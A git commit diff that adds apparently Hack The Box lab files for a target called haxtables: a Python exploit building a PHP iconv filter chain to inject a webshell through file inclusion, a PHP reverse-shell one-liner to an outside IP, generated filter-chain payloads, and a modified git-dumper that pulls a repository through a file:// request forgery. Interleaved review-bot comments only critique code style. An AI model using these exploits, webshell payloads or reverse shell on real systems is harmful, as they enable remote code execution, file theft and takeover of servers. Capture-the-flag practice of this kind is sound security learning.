old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions

104
HTB/encoding/ape.py Normal file

@@ -0,0 +1,104 @@
import requests
url = "http://haxtables.htb/handler.php"
file_to_use = "/etc/passwd"
command = "curl http://10.10.14.61/"
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
conversions = {
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'1': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF1002035D.EUC-KR|convert.iconv.MAC-CYRILLIC.T.61-8BIT|convert.iconv.1046.CSIBM864|convert.iconv.OSF1002035E.UCS-4BE|convert.iconv.EBCDIC-INT1.IBM943',
'2': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO6937.OSF1002011C|convert.iconv.CP1146.EUCJP-OPEN|convert.iconv.IBM1157.UTF8',
'3': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-7.CSISOLATIN3|convert.iconv.ISO-8859-9.CP905|convert.iconv.IBM1112.CSPC858MULTILINGUAL|convert.iconv.EBCDIC-CP-NL.ISO-10646',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
'5': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.RUSCII.IBM275|convert.iconv.CSEBCDICFR.CP857|convert.iconv.EBCDIC-CP-WT.ISO88591',
'6': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-37.MACUK|convert.iconv.CSIBM297.ISO-IR-203',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'a': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9066.CP1371|convert.iconv.KOI8-RU.OSF00010101|convert.iconv.EBCDIC-CP-FR.ISO-IR-156',
'b': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1399.UCS4',
'c': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.8859_9.OSF100201F4|convert.iconv.IBM1112.CP1004|convert.iconv.OSF00010007.CP285|convert.iconv.IBM-1141.OSF10020402',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'e': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.SHIFT_JISX0213|convert.iconv.IBM1164.UCS-4',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
'g': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022CN.CP855|convert.iconv.CSISO49INIS.IBM1142',
'h': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.THAI8.OSF100201B5|convert.iconv.NS_4551-1.CP1160|convert.iconv.CP275.IBM297',
'i': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM943|convert.iconv.CUBA.CSIBM1140',
'j': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.UCS-4BE|convert.iconv.IBM857.OSF1002011C',
'k': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO88594.CP912|convert.iconv.ISO-IR-121.CP1122|convert.iconv.IBM420.UTF-32LE|convert.iconv.OSF100201B5.IBM-1399',
'l': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.MACIS|convert.iconv.CSIBM865.10646-1:1993|convert.iconv.ISO_69372.CSEBCDICATDEA',
'm': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.CSSHIFTJIS|convert.iconv.NO2.CSIBM1399',
'n': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM862|convert.iconv.CP860.IBM-1399',
'o': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.CP861|convert.iconv.904.UTF-16|convert.iconv.IBM-1122.IBM1390',
'p': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1125.IBM1146|convert.iconv.IBM284.ISO_8859-16|convert.iconv.ISO-IR-143.IBM-933',
'q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NC_NC00-10:81.CSIBM863|convert.iconv.CP297.UTF16BE',
'r': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-86.ISO_8859-4:1988|convert.iconv.TURKISH8.CP1149',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
't': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.WINDOWS-1251.CP1364|convert.iconv.IBM880.IBM-1146|convert.iconv.IBM-935.CP037|convert.iconv.IBM500.L3|convert.iconv.CP282.TS-5881',
'u': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937:1992.ISO-IR-121|convert.iconv.ISO_8859-7:1987.ANSI_X3.110|convert.iconv.CSIBM1158.UTF16BE',
'v': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.HU.ISO_6937:1992|convert.iconv.CSIBM863.IBM284',
'w': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937-2:1983.857|convert.iconv.8859_3.EBCDIC-CP-FR',
'x': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1254.ISO-IR-226|convert.iconv.CSMACINTOSH.IBM-1149|convert.iconv.EBCDICESA.UCS4|convert.iconv.1026.UTF-32LE',
'y': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.EBCDIC-INT1.IBM-1399',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'A': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-111.IBM1130|convert.iconv.L1.ISO-IR-156',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'E': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.LATIN7.MACINTOSH|convert.iconv.CSN_369103.CSIBM1388',
'F': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9448.ISO-IR-103|convert.iconv.ISO-IR-199.T.61|convert.iconv.IEC_P27-1.CP937',
'G': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_8859-3:1988.CP1142|convert.iconv.CSIBM16804.CSIBM1388',
'H': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.EUCJP-OPEN|convert.iconv.CP5347.CP1144',
'I': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.DS2089|convert.iconv.OSF0004000A.CP852|convert.iconv.HPROMAN8.T.618BIT|convert.iconv.862.CSIBM1143',
'J': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.US.ISO-8859-13|convert.iconv.CP9066.CSIBM285',
'K': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1097.UTF-16BE',
'L': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ECMACYRILLIC.IBM256|convert.iconv.GEORGIAN-ACADEMY.10646-1:1993|convert.iconv.IBM-1122.IBM920',
'M': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.SE2.ISO885913|convert.iconv.866NAV.ISO2022JP2|convert.iconv.CP857.CP930',
'N': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM9066.UTF7|convert.iconv.MIK.CSIBM16804',
'O': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-197.CSIBM275|convert.iconv.IBM1112.UTF-16BE|convert.iconv.ISO_8859-3:1988.CP500',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'Q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NO.CP275|convert.iconv.EBCDIC-GREEK.CP936|convert.iconv.CP922.CP1255|convert.iconv.MAC-IS.EBCDIC-CP-IT',
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'S': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1154.UCS4',
'T': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1163.CP1388|convert.iconv.OSF10020366.MS-MAC-CYRILLIC|convert.iconv.ISO-IR-25.ISO-IR-85|convert.iconv.GREEK.IBM-1144',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'X': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF10020388.IBM-935|convert.iconv.CP280.WINDOWS-1252|convert.iconv.CP284.IBM256|convert.iconv.CP284.LATIN1',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'Z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.CSEBCDICFISE',
'+': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ANSI_X3.4-1986.CP857|convert.iconv.OSF10020360.ISO885913|convert.iconv.EUCCN.UTF7|convert.iconv.GREEK7-OLD.UCS4',
'=': ''
}
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"a@image.haxtables.htb/actions/action_handler.php?page=php://filter/{filters}/resource={file_to_use}&"
# final_payload = f"a@image.haxtables.htb/actions/action_handler.php?page=php://filter/convert.base64-encode|convert.base64-decode/resource={file_to_use}&"
r = requests.post(url, json={
"0": command,
"action": "",
"data":"",
"uri_path": final_payload
})
print(r.text)
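Review bot: Everything in ape.py runs at module level, so the `requests.post(...)` at the end fires on import as well as on direct execution, and it has no `timeout=`, so a host that never answers hangs the script. The request belongs in a `main()` behind `if __name__ == "__main__":`, with `timeout=10` and `r.raise_for_status()` before `print(r.text)`. A header comment should also state that `url`, `command` and `final_payload` are fixed values for one lab host (presumably the HTB box the directory is named after), since nothing in the file says so.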

1
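--- a/HTB/encoding/c
+++ b/HTB/encoding/c
@@ -0,0 +1 @@
+php -r '$sock=fsockopen("10.10.16.23",9001);system("sh <&3 >&3 2>&3");'&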

2
HTB/encoding/chain.txt Normal file

@@ -0,0 +1,2 @@
[+] The following gadget chain will generate the following code : <?phpinfo()?> (base64 value: PD9waHBpbmZvKCk/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|co
nvert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

1
HTB/encoding/flag.txt Normal file

@@ -0,0 +1 @@
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS
|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.b
ase64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

170
HTB/encoding/gitdumper.sh Normal file

@@ -0,0 +1,170 @@
#!/bin/bash
#$1 : URL to download .git from (http://target.com/.git/)
#$2 : Folder where the .git-directory will be created
function init_header() {
cat <<EOF
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
EOF
}
# get_git_dir "$@" for "--git-dir=asd"
# returns asd in GITDIR
function get_git_dir() {
local FLAG="--git-dir="
local ARGS=${@}
for arg in $ARGS
do
if [[ $arg == $FLAG* ]]; then
echo "${arg#$FLAG}"
return
fi
done
echo ".git"
}
init_header
QUEUE=();
DOWNLOADED=();
BASEURL="$1";
BASEDIR="$2";
GITDIR=$(get_git_dir "$@")
BASEGITDIR="$BASEDIR/$GITDIR/";
if [ $# -lt 2 ]; then
echo -e "\033[33m[*] USAGE: http://target.tld/.git/ dest-dir [--git-dir=otherdir]\033[0m";
echo -e "\t\t--git-dir=otherdir\t\tChange the git folder name. Default: .git"
exit 1;
fi
if [[ ! "$BASEURL" =~ /$GITDIR/$ ]]; then
echo -e "\033[31m[-] /$GITDIR/ missing in url\033[0m";
exit 0;
fi
if [ ! -d "$BASEGITDIR" ]; then
echo -e "\033[33m[*] Destination folder does not exist\033[0m";
echo -e "\033[32m[+] Creating $BASEGITDIR\033[0m";
mkdir -p "$BASEGITDIR";
fi
function start_download() {
#Add initial/static git files
QUEUE+=('HEAD')
QUEUE+=('objects/info/packs')
QUEUE+=('description')
QUEUE+=('config')
QUEUE+=('COMMIT_EDITMSG')
QUEUE+=('index')
QUEUE+=('packed-refs')
QUEUE+=('refs/heads/master')
QUEUE+=('refs/remotes/origin/HEAD')
QUEUE+=('refs/stash')
QUEUE+=('logs/HEAD')
QUEUE+=('logs/refs/heads/master')
QUEUE+=('logs/refs/remotes/origin/HEAD')
QUEUE+=('info/refs')
QUEUE+=('info/exclude')
QUEUE+=('/refs/wip/index/refs/heads/master')
QUEUE+=('/refs/wip/wtree/refs/heads/master')
#Iterate through QUEUE until there are no more files to download
while [ ${#QUEUE[*]} -gt 0 ]
do
download_item ${QUEUE[@]:0:1}
#Remove item from QUEUE
QUEUE=( "${QUEUE[@]:1}" )
done
}
function download_item() {
local objname=$1
local url="$BASEURL$objname"
local hashes=()
local packs=()
#Check if file has already been downloaded
if [[ " ${DOWNLOADED[@]} " =~ " ${objname} " ]]; then
return
fi
local target="$BASEGITDIR$objname"
#Create folder
if dir=$(echo "$objname" | grep -oE "^(.*)/"); then
mkdir -p "$BASEGITDIR/$dir"
fi
#Download file
echo $target
echo $objname
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
#Mark as downloaded and remove it from the queue
DOWNLOADED+=("$objname")
if [ ! -f "$target" ]; then
echo -e "\033[31m[-] Downloaded: $objname\033[0m"
return
fi
echo -e "\033[32m[+] Downloaded: $objname\033[0m"
#Check if we have an object hash
if [[ "$objname" =~ /[a-f0-9]{2}/[a-f0-9]{38} ]]; then
#Switch into $BASEDIR and save current working directory
cwd=$(pwd)
cd "$BASEDIR"
#Restore hash from $objectname
hash=$(echo "$objname" | sed -e 's~objects~~g' | sed -e 's~/~~g')
#Check if it's valid git object
if ! type=$(git cat-file -t "$hash" 2> /dev/null); then
#Delete invalid file
cd "$cwd"
rm "$target"
return
fi
#Parse output of git cat-file -p $hash. Use strings for blobs
if [[ "$type" != "blob" ]]; then
hashes+=($(git cat-file -p "$hash" | grep -oE "([a-f0-9]{40})"))
else
hashes+=($(git cat-file -p "$hash" | strings -a | grep -oE "([a-f0-9]{40})"))
fi
cd "$cwd"
fi
#Parse file for other objects
hashes+=($(cat "$target" | strings -a | grep -oE "([a-f0-9]{40})"))
for hash in ${hashes[*]}
do
QUEUE+=("objects/${hash:0:2}/${hash:2}")
done
#Parse file for packs
packs+=($(cat "$target" | strings -a | grep -oE "(pack\-[a-f0-9]{40})"))
for pack in ${packs[*]}
do
QUEUE+=("objects/pack/$pack.pack")
QUEUE+=("objects/pack/$pack.idx")
done
}
start_download
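Review bot: The usage text and the `/$GITDIR/` check still describe `$1` as the URL that is fetched, but in `download_item` the `curl` line ignores it: `local url="$BASEURL$objname"` is assigned and never read, and the request goes to a fixed endpoint with a fixed `file:///var/www/image/.git/` prefix. The header comment should say so, for example `# NOTE: modified copy - $1 is validated but not used; endpoint and repository path are hard-coded in download_item`, and the dead `url` local can be dropped. gitdumper2.sh is the same file without the two debugging `echo` lines, so the same comment applies there and one of the two copies is redundant.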

168
HTB/encoding/gitdumper2.sh Normal file

@@ -0,0 +1,168 @@
#!/bin/bash
#$1 : URL to download .git from (http://target.com/.git/)
#$2 : Folder where the .git-directory will be created
function init_header() {
cat <<EOF
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
EOF
}
# get_git_dir "$@" for "--git-dir=asd"
# returns asd in GITDIR
function get_git_dir() {
local FLAG="--git-dir="
local ARGS=${@}
for arg in $ARGS
do
if [[ $arg == $FLAG* ]]; then
echo "${arg#$FLAG}"
return
fi
done
echo ".git"
}
init_header
QUEUE=();
DOWNLOADED=();
BASEURL="$1";
BASEDIR="$2";
GITDIR=$(get_git_dir "$@")
BASEGITDIR="$BASEDIR/$GITDIR/";
if [ $# -lt 2 ]; then
echo -e "\033[33m[*] USAGE: http://target.tld/.git/ dest-dir [--git-dir=otherdir]\033[0m";
echo -e "\t\t--git-dir=otherdir\t\tChange the git folder name. Default: .git"
exit 1;
fi
if [[ ! "$BASEURL" =~ /$GITDIR/$ ]]; then
echo -e "\033[31m[-] /$GITDIR/ missing in url\033[0m";
exit 0;
fi
if [ ! -d "$BASEGITDIR" ]; then
echo -e "\033[33m[*] Destination folder does not exist\033[0m";
echo -e "\033[32m[+] Creating $BASEGITDIR\033[0m";
mkdir -p "$BASEGITDIR";
fi
function start_download() {
#Add initial/static git files
QUEUE+=('HEAD')
QUEUE+=('objects/info/packs')
QUEUE+=('description')
QUEUE+=('config')
QUEUE+=('COMMIT_EDITMSG')
QUEUE+=('index')
QUEUE+=('packed-refs')
QUEUE+=('refs/heads/master')
QUEUE+=('refs/remotes/origin/HEAD')
QUEUE+=('refs/stash')
QUEUE+=('logs/HEAD')
QUEUE+=('logs/refs/heads/master')
QUEUE+=('logs/refs/remotes/origin/HEAD')
QUEUE+=('info/refs')
QUEUE+=('info/exclude')
QUEUE+=('/refs/wip/index/refs/heads/master')
QUEUE+=('/refs/wip/wtree/refs/heads/master')
#Iterate through QUEUE until there are no more files to download
while [ ${#QUEUE[*]} -gt 0 ]
do
download_item ${QUEUE[@]:0:1}
#Remove item from QUEUE
QUEUE=( "${QUEUE[@]:1}" )
done
}
function download_item() {
local objname=$1
local url="$BASEURL$objname"
local hashes=()
local packs=()
#Check if file has already been downloaded
if [[ " ${DOWNLOADED[@]} " =~ " ${objname} " ]]; then
return
fi
local target="$BASEGITDIR$objname"
#Create folder
if dir=$(echo "$objname" | grep -oE "^(.*)/"); then
mkdir -p "$BASEGITDIR/$dir"
fi
#Download file
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
#Mark as downloaded and remove it from the queue
DOWNLOADED+=("$objname")
if [ ! -f "$target" ]; then
echo -e "\033[31m[-] Downloaded: $objname\033[0m"
return
fi
echo -e "\033[32m[+] Downloaded: $objname\033[0m"
#Check if we have an object hash
if [[ "$objname" =~ /[a-f0-9]{2}/[a-f0-9]{38} ]]; then
#Switch into $BASEDIR and save current working directory
cwd=$(pwd)
cd "$BASEDIR"
#Restore hash from $objectname
hash=$(echo "$objname" | sed -e 's~objects~~g' | sed -e 's~/~~g')
#Check if it's valid git object
if ! type=$(git cat-file -t "$hash" 2> /dev/null); then
#Delete invalid file
cd "$cwd"
rm "$target"
return
fi
#Parse output of git cat-file -p $hash. Use strings for blobs
if [[ "$type" != "blob" ]]; then
hashes+=($(git cat-file -p "$hash" | grep -oE "([a-f0-9]{40})"))
else
hashes+=($(git cat-file -p "$hash" | strings -a | grep -oE "([a-f0-9]{40})"))
fi
cd "$cwd"
fi
#Parse file for other objects
hashes+=($(cat "$target" | strings -a | grep -oE "([a-f0-9]{40})"))
for hash in ${hashes[*]}
do
QUEUE+=("objects/${hash:0:2}/${hash:2}")
done
#Parse file for packs
packs+=($(cat "$target" | strings -a | grep -oE "(pack\-[a-f0-9]{40})"))
